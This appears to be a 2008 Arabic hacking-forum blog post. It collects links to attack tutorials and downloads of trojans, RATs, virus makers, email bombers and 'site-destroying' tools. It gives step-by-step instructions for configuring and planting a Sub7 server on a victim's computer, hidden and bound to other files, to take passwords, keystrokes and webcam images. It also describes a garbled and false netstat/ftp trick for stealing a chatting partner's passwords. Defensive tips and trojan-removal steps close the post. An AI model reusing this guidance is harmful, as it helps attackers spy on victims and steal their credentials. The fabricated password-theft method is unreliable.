الأربعاء، 10 سبتمبر 2008

اختراق المواقع والسيرفرات


بسم الله الرحمن الرحيم

هذه شروحات فيديو رائعة لاختراق المواقع والسيرفرات

إختراق أنظمة لينوكس
linux system hacking

http://revver.com/watch/482346/flv/a...king-tutorial/

أختراق الجوالات بالبلوتوث للنوكيا
mobile hacking -blue snarfing attack for nokia

http://revver.com/watch/483524/flv/a...obile-hacking/

اختراق الباسووردات
PASSWRD HACKING VIDEO TUTORIAL

http://revver.com/watch/487465/flv/a...0/cain-to-arp- poison-and-sniff-passwords/


ثغرة في الاكسبلورار تمكنك من تطبيق اوامر
Internet Explorer Remote Command Execution Exploit (CMDExe) Client
Side Attack (Lo-Res)

http://revver.com/watch/487499/flv/a...plorer-remote- command-execution-exploit-cmdexe-client-side-attack-lo-res/


نفس الثغرة السابقة ولكن شرح لتطبيق اوامر اقوى
Internet Explorer Remote Command Execution Exploit (CMDExe) Client
Side Attack (Hi-Res)

http://revver.com/watch/487480/flv/a...plorer-remote- command-execution-exploit-cmdexe-client-side-attack-hi-res/


تثبيت ال VNC
Install VNC Remotely!

http://revver.com/watch/487479/flv/a...-vnc-remotely/


كيف تقوم بعمل سنيفر على الشبكة كاملة
How to sniff around switches using Arpspoof and Ngrep!

http://revver.com/watch/487475/flv/a...-sniff-around- switches-using-arpspoof-and-ngrep/


اختراق موقع في 10 دقائق
BREAKING WEP IN 10 minutes

http://revver.com/watch/487464/flv/a...in-10-minutes/


عمل هجوم DOS على سيرفرات الوندوز .. مفيد جدا !!
DoS attack against Windows FTP Server -DoS

http://revver.com/watch/487467/flv/a...ttack-against- windows-ftp-server-dos/



أرجو ان تفيدكم


هذا البرنامج القوى والذى اثبت جدارته فى تدمير المواقع وهو سهل الاستخدام فهو من صنع العربى وتمت تجربته والبرنامج ممتاز بصراحه





pass:zidane_moh@dvd4arab.com


برنامج هاك تيك برنامج قوي وفعال في تدمير المواقع والبرنامج غير مشهور لأنه غير موجود بالمواقع و المنتديات العربيه ومن مميزات البرنامج أنك لك الخيارات في الهجوم من حيث السرعه والقوه والبرنامج يدمر الايميلات ويعمل بحث(سكان) للمواقع والآي بيهات وغيرها من مهماته فهو برنامج بمميزات كثيره


حمل برنامج Hak Tek من




pass:zidane_moh@dvd4arab.com

لاختراق الايميلات



برنامج لااختراق الايميلات وارسال الباسوردات لك


في البداية يجب تحميل البرنامج وهناك رابطين احدهم ملف zip و rar
http://nokhbah.org/up-pic/uploads/f11266a115.zip
http://nokhbah.org/up-pic/uploads/89a431b5e0.rar


نبداء بالشرح بسم الله



رقـم 1 ضع بريدك ,, وانصحـك بعدم استخدام الهوتميل يمكنك استخدام مكتوب او جواب اوياهو الخ..

رقــم 2 : لتجربـة التبليغ

رقـم 3 : تكوين السيرفر ,,

الان مجرد ماترسل السيرفر للضحية تأتيك البـاسوردات عالايميل مبـاشرة.











الكم اقوى برامج هكر بالعالم وهذه البرامج اخر الاصدارات انشاء الله
والمفاجئة في رابط واحد


قريب حانزل الشرح بتاعهم



IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0



انا تعبت وانا ادور على البرامج لانها نادرة واعتقد ما راح تلقون مثلها











يتبع

اختراق الايميل بدون ارسال اى شىء للضحيه


اخواني واخواتي اليكم هذه الطريقة السهلة للوصول لجهاز الضحية واختراق الايميل من غير تعب او ارسال اي لينك او ملف او باتش كل ما هو انت بحاجة له هو شدة انتباه وانتهاز للفرصة وذكاء كي تستطيع تطبيق هذه الطريقة وقد تمت من قبل لكن من غير شرح ولم يفلح الكثيرين فيها ولكني سوف اضع لكم الشرح المفصل لاساعدكم على هذه العملية من الاختراق وهي لا تلزم الاحتراف في درب الاختراق لتنفيذها وعدا عن ذلك فان هذه الطريقة سوف تأخذكم الى مكان بعيد في المستقبل وتذكرو كلامي حيث انها سوف تفتح امامكم هذه الخصائص التي هي غير مؤلوفة لبعضكم مثل كيفية التعرف على الدوس واستعمالnetstat -n وعن كيفية الوصول الى اي بي معين موجود معك على نفس السيرفر وطالما انكم وصلتم الى هذا الموضوع فهذا يعني ان امور الهكر تعنيكم وتحبونها اذا فلنبدا وارجو ان تنظرو الى النصف المليىء من الكأس وليس النصف الفارغ.

اولا: يجب ان تفتح الايميل وتكلم شخص موجود معك على نفس السيرفر لان هذه الطريقة تعتمد على ذلك وتذكرو كلمة يجب مثلا سيرفر الهوت ميل يجب تتحدث مع شخص تريد اختراقه على الهوت وعند تحدثك معه فأنت الآن قد وجت معه على نفس السيرفر ..

ثانيا: اذهب على قائمة ابدأ ومن ثم الى تشغيل او run واكتب هناك هذا الامر
command كي تفتح الدوس .

ثالثا: اكتب داخل الدوس هذا الامر netstat -n سوف يفتح لك شباك فيه العديد من الاي بي والبورتات على هذا النحو Proto Local Address Foregin Address State Stat

Foregin Address = اى العنوان الاجنبى

State = اى الحاله او حاله الاتصال

وهذا ما يهمنا نستكمل.

في عنوان الاي بي تجد في الاسفل الاي بي الخاص بالضحية وهو آخر اي بي على جهة اليمين وهو ما يلزمنا.

رابعا: اكتب هذا الامر في موجه الاوامر الدوس ftp ترى بعد كتابتها ان الftp
قد نزل لتحت لوحده انت اكتب كلمة open فينزل الى كلمة to وهنا تكتب الاي بي الخاص بالشخص المراد الدخول الى جهازه ومن ثم انتر سوف تصبح الآن في جهاز الضحية ومتصل معه تماما.

خامسا : اكتب هذا الامر ping-pass.bat وانتظر قليلا ومن ثم اذهب الى C وسوف ترى هناك ملف بهذا الاسمping-pass.bat وسوف يكون بهذا الامتداد bat انت غيرو الى هذا الامتداد txt
سوف تشاهد بعدها جميع الباسوردات التي استخدمها الضحية على جهازه..


هام هام هام : يجب ان تعلم ان امر ال netstat -n لا يعمل الا اذا كنت متصلا بلانترنت فقطط ويجب ان تعلم انك ايضا ان تحدثت مع اي شخص سوف يظهر لك الاي بي الخاص به في هذا الموجه ولذلك احصر التحدث بشخص واحد لتعلم الشخص المراد اخذ الاي بي الخاص به ويجب ان تعلم شيء آخر انه يجب ان يكون الشخص المراد دخول جهازه متصلا بلانترنت وعلى نفس السيرفر ايضا والا لن تنج وبهذا قصدت عندما قلت انه يجب ان تكون منتهزا للفرصة وذكي واخيرا فان امر ال netstat -n يساعدك ايضا على معرفة البورتات الموجودة معك على نفس السيرفر واهم شيء يساعدك على معرفة ان كان هنالك اتصال بينك وبين جهاز آخر او انك مخترق ..

اختراق البريد والشات

قدم لكم برنامج:


mspass


و ذو فائدة عظيمة جدا جدا جدا
و خطير و رهيب و رائع
أخي هل نسيت كلمة المرور الى صندوك البريد
مهما كان نوعه ... طيب لا تهتم و لا تغتم
فقط ضغطة واحدة على البرنامج و تكون عندك كل ايملاتك
مع كلمات السر كمان


إهداء الى كل من أضاع كلمة المرور








طريقة استرجاع الايميل المسروق


نزولا عن رغبة الكثيرين من الأعضاء أضع بين ايديكم طريقة استرجاع الإميل المسروق و كما قلت لكم

الطريقة لم أجربها قط و هي منقولة و لكن اتمنى ان تفي بالغرض و ارجوا ان كل من طبقها و نجحت معه

ان يبلغني حتى يتم اعتماد هذه الطريقة بصفة رسمية

على بركة الله ابدا الشرح







متطلبات العمل

1 . بريد اخر علي الهوتميل لكي يتم إرسال رابط إستعاده كلمه المرور إليه
2 . ان تكون عندك دراية بسيطة باللغة الإنجليزية
3 . معرفتك بإسمك الأول و الأخير و تاريخ ميلادك الذي قمت بالتسجيل به في بادء الأمر
4 . ان تحاول تذكر جميع المعلوات التي وضعتها اثناء تسجيلك بالهوتمايل






الخطوه الأولى

مراسلة الدعم الفني للهوتميل و ذلك عن طريق الرابط التالي

www.msn.com



بعد الضغط على HOTMAIL تظهر لنا صفحة جديدة



كود:


CODE
hello,My password has been changed by arabian ******* whose use XSS exploit in your system i hope i can restore my e-mail as it's have very secret information about me , my family & my company... , what can i do to restore my mail? , I can answer any question in the old infomation's account,,My e-mail is :إكتب هنا إسم بريدك المخترقWith my best wishes



بعد اتباع مراحل الخطوة الأولى كاملة سوف تنتظر مدة 24 ساعة كحد أقصى لتصلك هذه الرسالة من

الدعم الفني للهوتمايل

كود:


CODE
Hello metoovet (سوف تاتيك رسالة بالإسم الذي راسلته به مثلا metoovet )Thank you for writing to Windows Live ID Technical Support. My name is Rona Ivy and based on your message, you believe that your tnsamni@hotmail.com account has been compromised. I realize how frustrating this has been to you. I apologize for the inconvenience this has caused you. شكرا لك لمراسله الدعم الفني الخاص بنا إسمي هو (رونا إيفي) وقد تم تعيني لحل مشكلتك و طبقا لما وضحت في طلب دعمك أنك تعتقد ان بريدك tnsamni@hotmail.com تم إختراقه وانا اشعر بمدي إحباطك الان وقلقك بخصوص معلوماتك.I would like to help you regain access right away, but because we value our members’ security and privacy, we will need your cooperation in verifying the account ownership. When we receive and verify the necessary information, we can give you the link that will allow you to reset your password. Please provide the following completely and accurately:أتمني ان أستطيع ان افيدك عن طريق الطرق المشروعه ولكن بسبب تقديرنا لسريه عملائنا وحفظنا لهذه السريه سوف نحتاج إلي إثبات انك صاحب البريد الموضح فعلا وعندما نتأكد من ذلك سنقوم بإمدادك برابط خاص لإرجاع كلمه المرور علي اي بريد تحدده انت من فضلك قم بتعبئه النموذج التالي كاملا: 1. Your Windows Live IDالإيميل المخترق2. Your First and Last Namesإسمك الأول والأخير3. Date of Birth (Month/Date/Year)تاريخ ميلادك بالميلادي تفصيلا4. Country or Regionالبلد المسجله في بريدك 5. State (if applicable)المنطقه (أتركها فارغه لو ماتذكرت المنطقه الموجوده في بريدك)6. Zip or Postal Codeالرقم البريدي الخاص بك (أتركها فارغه لو ماتذكرت )7. Your IP address. List the IP addresses from each computer that you use to access your account. You can go to http://www.whatismyip.com to find this information. The numbers that appear at the top of this page will be your IP address. رقم الأي بي الذي تدخل منه علي بريدك في اكثر الأوقات ويمكنك معرفته بالرابط التالي: http://www.whatismyip.com 8. Answer to your Secret Question (if applicable)الان قم بالإجابه علي الأسئله التاليه في حاله تذكرك لها 9. Alternate email address associated with the account (if applicable)بريدك الإحتياطي المسجل في الإيميل المخترق قبل الإختراق مباشره 10. Your Internet Service Provider. An ISP is a company that provides an end user with a connection to the Internet and other similar services, such as e-mail. Examples include MSNIA, EarthLink, and Comcast.إسم مزود الخدمه الخاص بك (خدمه الإنترنت مثل : اول نت او لنك دوت نت وكده)11. Last date and time you successfully signed in اخر مره إستطعت الدخول لبريدك بدون مشاكل (تاريخ الإختراق)For Windows Live Mail customers إجابه الأسئله التاليه خاصه بمستخدمي اللايف فقط:12. Any folders you created (aside from the default folders)أذكر إسم اي فولدر قمت بعمله في إيميلك المخترق 13. Contacts in your address book (please include the e-mail address)أذكر اي بريد او إسم لشخص مسجل في عنواين الإيملات في إيميلك المخترق14. Subjects of any old mail that is in your Inbox or mail folders أذكر عنوان اي بريد في إيميلك المخترق او إسم المرسل يفضل ذكر كل ما تتذكره.For Windows Live Messenger customersأسئله لمستخدمي الماسنجر فقط:15. A list of Contacts in your buddy list (please include the e-mail address)يرجي ذكر قائمه بجهات الإتصال في إيميلك المخترق (اكبر عدد يمكنك تذكره)16. Your Windows Live Messenger Nickname (your Messenger display name)يرجي ذكر النيك نيم بتاعك قبل إختراق الإيميل مباشره Your patience and cooperation on this matter are greatly appreciated. We look forward to your reply.بإذن الله سيتم حل المشكله و صبرك وتعاونك معنا او انسب وسيله للوصول لحل في اقرب وقت بإنتظار ردك عليناYou are a valuable customer to MSN and we are glad to give you consistent and effective service. Thank you for using Windows Live ID.أنت عميل غالي علينا ونتمني ان نقوم بخدمتك بالشكل المطلوب وشكرا لك لإستخدام خدمه وينودوز لايف اي دي


الخطوة الثانية
هي تغيير كلمة المرور الى كلمة مرور جديدة

الآن سوف تصلك رسالة على البريد الذي تمت ارسال كلمة المرور له و سوف تلاحظ وجود رسالة من

دعم عملاء مايكروسفت كما في الصورة










بعد الذخول على الرسالة ستجد رابطين

بعد الضغط على الرابط الأول ستظهر لك صفحة جديدة تطلبك من ادخال بريدك المسروق قم بادخاله

الخطوة النهائية هي ادخال كلمة مرور جديدة و السؤال السري

كيف احمي نفسي؟


1: التأكد من نظافة الملفات قبل فتحها مثل exe لانها ملفات تشغيليه واذا ارسلك واحد شي وهو ماهو برنامج وامتداده exe معناه ممكن يكون فيروس

2: عمل سكان كامل على الجهاز كل ثلاث ايام

3: التأكد من تحديث الانتي فايروس كل اسبوع على الاقل (شركة نورتون تطرح تحديث كل يوم او يومين)

4: وضع Firewall جيد

5: وضح Anti-Virus جيد

6: ايقاف خاصية مشاركة الملفات :-

control panal / network / configuration / file and print sharring

i want to be able to give others access to my files

الغي التحديد

ثم ok

7: لا تظل مدة طويلة متصل بالشبكة بحيث لو ان واحد دخل عليك ما يظل يخرب فيك و عند خروجك و دخولك

مره اخرى للشبكة يغير اخر رقم من الايبي

8: و هذا الموقع يفحص جهازك و يخبرك بنقاط الضعف و الحلول

http://www.antionline.com

9: لا تخزن كلمات المرور او كلمات اسر على جهازك (مثل كلمة المرور لاشتراكك في الانترنت او البريد الكتروني او ...)

10: لا تفتح اي ملفات تكون وصلة على بريدك الا بعد التأكد من نظافتها ..

11: اذا لاحظت حدوث اي شئ غريب مثل حلل في اي برامج او خروج و دخول السي دي افصل الاتصال فورا و تأكد من نظافة الجهاز



بعض المنافذ

------------

GirlFrind 21554





SubSeven 27374.1243.1999.6776.6711





Deepthroat 66670





NetBus 12345. 12346.20034.1045





BackOrifice 31338.31337.31666.54320





Hack'a'tack 31787.31785






افضل البرامج



برامج الهاك

============



برامج هاك الاجهزه

-----------------

Sub 7 , Bo2k , Netbus ,



والافضل Bo2k ولكن الاكثر انتشارا Sub7





Sub 7 2.1 Gold

Socket23



Kuang

Sub7 V2.2





BO120





BO2K





Netbus1.7





Netbus 2 Pro





Deepthroat V.3





Deepthroat V.3.1





GirlFriend 135





برامج تدمير البريد

------------------

Aenima , Kaboom , euthan , emailbomber , Death & Destruction Email Bomber v4.0 -

Aenima الافضل و الاسرع





aenima_V20





haktek





Euthan V1.5





Death & Destruction Email Bomber v4.0





Bounce Spam Mail V1.4





AnonyMail





برامج اكتشاف ثغرات المواقع

---------------------------

Voideye , Shadow Scan Security (SSS)

والافضل SSS وهو يعتبر مكتبة برامج هاك متكامله و سنتكلم عنه لاحقا





Shadow Scan Security V.3.7





Crack V.3.7











Crack V.2.7





Voideye V.1





Voideye V.2





برامج اللسه (للبريد و المواقع)

-------------------------------

wwwhack , webcracker , MungaBunga

الاقضل MungaBunga





Brut us A2





GoldenEye V1.0



برامج الحماية (فير وول)

------------------------

Zone alarm , Tiny Personal Firewall 2.0.14 , Noewtach وBlackICE Defender v2.5 co

الافضل Zone alarm









Norton Internet Security 2001 v 2.5 Family Edition





Tiny Personal Firewall 2.0.14





Zone alarm

S/N dk68s-vfgfv-wh0jt-wnm68g-kx0w00



LOCKDOWN Millennium V8.1.1

LOCKDOWN Millennium V8.1.1





Intruder Alert '99



برامج مقاومة الفيروسات

-----------------------

Norton Anti-Virus , Mcafee , Pc-cillin

عندما يكون عدد الفيروسات مبير افضل Pc-cillin اما اذا عدد قليل Norton الافضل





AntiViral Toolkit Pro (AVP) Gold



AntiViral

Norton Anti-Virus 2001





Cleaner V.3.2



برامج البنج

------------



evil ping





Dorrah





برامج Spoofing

---------------





DC Internet Services Pack





Windows Spoofer 97





******s

--------



****** Crusher v2.










إليكم شرح مكونات البرنامج :

في بدايه صفحة البرنامج نجد 7 اقسام :

1))القسم الاول : connection عند الضغط عليه سنجد( 5 )اختيارات وهي كالتالي :

1ـ1) ip scanner البحث عن الضحايا بتحديد الاي بي والبورت .

2ـ1) get pc info مواصفات جهاز الضحيه .

3ـ1) get home info مواصفات بيت الضحيه منها التليفون ( المعلومات اللي بهالجزء ماتبان الا اذا صاحب الجهاز خزنها في جهازه ) .

4ـ1) server options مواصفاة السيرفر الملف الذي يتيح لك التحكم بالضحيه ( هذه المعلومات يدخلها غير صاحب السيرفر الاصلي لتغيير معلومات السيرفر السابقه ).

5ـ1) ip notify ربط الضحيه اما ( اي سي كيو ، ايرسي ، الايميل ) وهذه المعلومات يدخلها غير صاحب السيرفر الاصلي لتغيير معلومات السيرفر القديمه .



القسم الثاني : keys/messages عند الضغط عليه سنجد ( 6 ) اختيارات وهي كالتالي :

1ـ2) keyboard سنجد تحته 5 اقسام وهي : open key logger فتح الستار . send keys ربط اي برنامج عند الضحيه بزر من عنده تحدده انت . get offiline keys ربط الضحيه بازرار الكي بورد بحيث ان لمس الزر نعرف انه دخل النت . clear offiline keys الغاء الامر السابق . disable keyboard الغاء الكي بورد ولا يستطيع رده نهائي حتى انت .



2-2) chat الشات التي تظهر عند الضحيه في منتصف الشاشه للتحدث معه .( ورفع ضغطه شوي )

3-2) matrix شات ماتركس اي امتلاك الشاشه بالشات .

4-2) msg manager علامات الخطا انت تضع علامات الخطا والملاحظه .

5-2) spy التحكم في تصكير الشات من الانواع اللي يذكرها لك.

6-2) icq takeover رؤية ارقام الاي سي كيو وشطب اي رقم تريد شطبه عند الضحيه .





القسم الثالث : advanced سنجد تحته ( 6 )اقسام :

1-3) ftp/http اسلوب من الاساليب لتنزيل او الارسال للضحيه .

2-3) find files البحث عن فايل معين عند الضحيه .

3-3) passwords الباسووردات الموجوده في الحهاز او المذكوره . ونجد تحته ( 6 ) اقسام وهي: get cached passwords هو الباسوورد الذي دخل به النت واليوزر نيم . get recorded password تخزيين الباسووردات ومسحها . show received password جميع الباسووردات التي حصل عليها من قبل . retrieve ras password باسوورد النت وبعض الباسووردات للبرامج . get icq password ارقام الاي سي كيو . get iam password باسوورد الشات المذكور .

4-3) reg edit التحكم في ملفات الويندوز .

5-3) app redirect التحكم في اتجاه مايفعله الضحيه .

6-3) port erdirect تغيير البورت او الاي بي عند الضحيه .



القسم الرابع : miscellaneous سنجد تحته ( 6 ) اقسام :

1-4) fiel manager الملفات الرئيسية .

2-4) window manager التحكم في الويندوز وتشغيل واغلاق البرامج .

3-4) process manager التحكم في المعالج يعني الادوات الرئيسية في الجهاز .

4-4) text-2-speech كتابة رسالة الويف المطلوبه لتتحدث مع الضحيه بالسماعات .

5-4) clipboard manager اضافة بعض الاشياء .

6-4) irc dot التحكم في بورت الاي ار سي .



القسم الخامس: fun manager سنجد تحته اقسام :

1-5) desktop/wepcam سنجد تحته خيارات وهي : open screen preview رؤية الشاشه الرئيسية بكامل تغيراتها . full screen capture صوره من وضع شاشة الضحيه الحالي . wepcam/quickam capture تشغيل الكاميرا ان وجد لدى الضحيه .

2-5) filp screen التحكم في الشاشه فرها من اليمين للشمال وقلبها .

3-5) print التحكم في طابعة الضحيه وطباعة اي شئ .

4-5) drowser التحكم في فتح اي موقع تريده .

5-5) resolution التحكم بالشاشة والملفات .

6-5) win colors التحكم في الوان الويندوز ( البار واعلى المتصفح ).



القسم السادس: extra fun سنجد تحته اقسام :

1-6) screen sarver التحكم بشاشة التوقف .

2-6) restart win التحكم بالويندوز كاعادة التشغيل وغيره وسنجد تحته خيارات وهي: normal shut down اعادة تشغيل الكمبيوتر طبيعي . rorce windows shutdown اطفاء جهاز الضحيه بالغصب . log off windows user تغيير اسم جهاز الضحيه . shutdown and power off تقفيل الجهاز للضحيه تقفيل عادي . erboot system تقفيل الجهاز .

3-6) mouse التحكم في سرعة الماوس واخفائها .

4-6) sound التحكم في صوت السماعات .

5-6) time/data التحكم في الوقت والزمن .

6-6) extra التحكم في خاصيات الجهاز مثل السي دي روم وغيره وتحته اختيارات وهي: dasktop التحكم في اخفاء الملفات والبرامج الموجوده على سطح المكتب . start button اخفاء زر البدايه ستارت . taskdar اخفاء البار اللي باسفل الشاشه . cd rom فتح واغلاق السي دي . speaker تشغيل السماعات التي يتم الاتصال منها بداخل الجهاز بشكل مزعج . monitor اغلاق الشاشه . ctrl + alt + delet عدم التحكم بهذه الخدمه . scroilock اختيار الاحرف الكبيرة وليست الكابيتل اللي بالبورد . capslock اجبار الضحية بالكتابه بالاحرف الكابيتل الكبيره . nume lock تشغيل الارقام اللي بيمين البورد.



القسم السابع والاخير: local options سنجد تحته اقسام :

1-7) quality التحكم في الكاميرا تكبير ونصغير ومشغلات الفيديو .

2-7) local tolder كل ضحيه له ملف عندك بحيث اي شي تنزله من جهازه تلقاه في ملفه .

3-7) client colors التحكم بالوان الويندوز الرئيسية .

4-7) misc options التحكم بالموسيقه .

5-7) advanced التحكم في بورت الشاشه .

6-7) run edit server كيفية صنع ملف السيرفر ووضع الاوامر فيه .



**************************************************











******************************************



كيفية استخدام وزرع السيرفر في جهاز الضحيه ؟؟؟



1) نفتح ملف (dit server)ونضغط على كلمة(browse) وندخل ملف (server) من فولدر السب سفن اللي عندنا بالجهاز فيصبح مكتوب c:/nuzipped/sub/server.exe



2) نذهب الى enabel icq notify to unin 935099 ونلغي الرقم ونكتب الرقم الخاص بك انت .... ليه؟؟ لانه حين يدخل الضحيه للنت وتكون انت فاتح الاي سي كيو الخاص بك فستاتيك رساله تخبرك بان الضحيه دخل النت ويوجد فيها الرقم السري للسيرفر ، ورقم الاي بي ، واسم الضحيه ، وبياناتك اللي ادخلتها في السيرفر .



3) نذهب للسطر اللي تحته مباشرة enable irc هذا السطر لكي نربطه مع الاميرسي



4) نذهب لاعلى اليمين chnge sever acon ونختار اي من الصور الموجوده ثم نضغط على epply لكي تتغير صوره السيرفر الى التي تم اختيارها .



5) نذهب الى server passoword لندخل كلمه السر لحفظ السيرفر من عدم استخامه من شخص (هاكر) اخر ، ندخل الباسوورد مره اخرى ونضع علامة امام المربع المقابل له لكي تعمل هذه الخاصيه .



6) نضع علامة امام المربع المقابل للسطر هذا protect server and password .



7) melt server after installation وظيفة هذا السطر انه اذا ضغط الضحيه على ملف السيرفر فسوف يختفي الملف في جهاز الضحيه ولا يستطيع ان يراه مره اخرى فقط ضع علامة في المربع اللي قدامه اذا اردت تشغيله .



8) bind server with file لربط السيرفر مع اي ملف exe تضع علامة في المربع ثم تذهب الى browse وتدخل الملف المراد ربطه فيه .



9) protect editserver so it can`t be edit هنا نضع علامة في المربع المقابل في هذا السطر ونكتب الباسوورد ونعيد كتابته مرة ثانيه .



10) واخيرا نضغط على ....save anew copy of .

اهم ملاحظه لا يجوز تحميل السيرفر بالمعلومات مرتين .....!!





خصائص البرنامج

Win 95 – Win 98 نظام التشغيل



منافذ البرنامج 6711 6776 1243 1999 الاصدار الاخير منه له خمس خانات مثال 12345



التعديلات التي يحدثها هذا البرنامج في جهاز الضحية :



أعـراض الإصابة :



من أهم أعراض الإصابة بهذا البرنامج ظهور رسالة " قام هذا البرنامج بأداء عملية غير شرعية ... " وتظهر هذه الرسالة عند ترك الكمبيوتر بدون تحريك الماوس أو النقر على لىحة المفاتيح حيث يقوم البرنامج بعمل تغييرات في حافظة الشاشة وتظهر هذه الرسائل عادة عندما تقوم بإزالة إدخالات البرنامج في ملف system.ini كما أن بإمكان الخادم إعادة إنشاء نفسه بعد حذفه من الويندوز باستخدام بعض الملفات المساعدة له في ذلك



خطورة البرنامج :



يمكن عمل تعديلات على الخادم الخاص بالبرنامج من خلال برنامج التحرير الخاص به لذلك فإنه من الواجب البحث في أي مكان ممكن أن يسجل فيه ليعمل تلقائيا يعني أي مكان يمكن وضع أوامر للويندوز ليقوم بتشغيله تلقائيا .



التخلص منه :



1- افتح الملف win.ini الموجود في مجلد الويندوز وابحث في بداية السطور الأولى من هذا الملف عن أي قيم شبيهة بالقيم التـالية :



run=xxxx.exe أو run = xxxx.dll أو Load=xxxx.exe أو Load = xxxx.dll



لاحظ أن xxxx تعني اسم الخادم وإذا عثرت على أي قيمة منها فقم بحذفها



2- افتح الملف system.ini الموجود في مجلد الويندوز وفي السطر الخامس تقريباً ستجد السطر التالي : shell = Explorer.exe ...



فإذا كان جهازك مصابا ستجد السطر على هذا الشكل :



shell=Explorer.exe xxxx.exe .... أو shell = Explorer.exe xxxx.dll



مع العلم بأن xxxx هو إسم الخادم الذي من أشهر أسمائه rundll16.exe و Task_Bar.exe و server.com او server.exe فإذا كان كذلك فقم بمسح إسم الخادم فقط ليصبح السطر



: shell = Explorer.exe



2- إضغط على start ثم تشغيل ثم إكتب regedit لتدخل الى



ملف السجل ثم قم بالدخول تسلسليا على الأتي :



HKEY_LOCAL_MACHINE



Software



Microsoft



Windows



Current Version

داخل المجلد Run إبحث عن إسم الخادم الذي عثرت عليه في مــلف system.ini أو الملف win.ini ( في بعض الأحيان قد يتغير إسم الخادم في ملف التسجيل لذلك إبحث عن أي شي غريب ) ثم بعد ذلك توجه لمجلد الويندوز وستجد أن حجم الخادم الذي عثرت عليه في ملف التسجيل حوالي 328 كيلو بايت إذا كان كذلك عد لنفس المنطقة في ملف التسجيل وقم بحذف القيمة وذلك بالنقر على إسمها وإختيار حذف delete الآن أعد تشغيل الجهاز ثم توجه لمجلد الويندوز وقم بحذف الخادم بالنقر عليه بالزر الأيمن للماوس وإختيار حذف0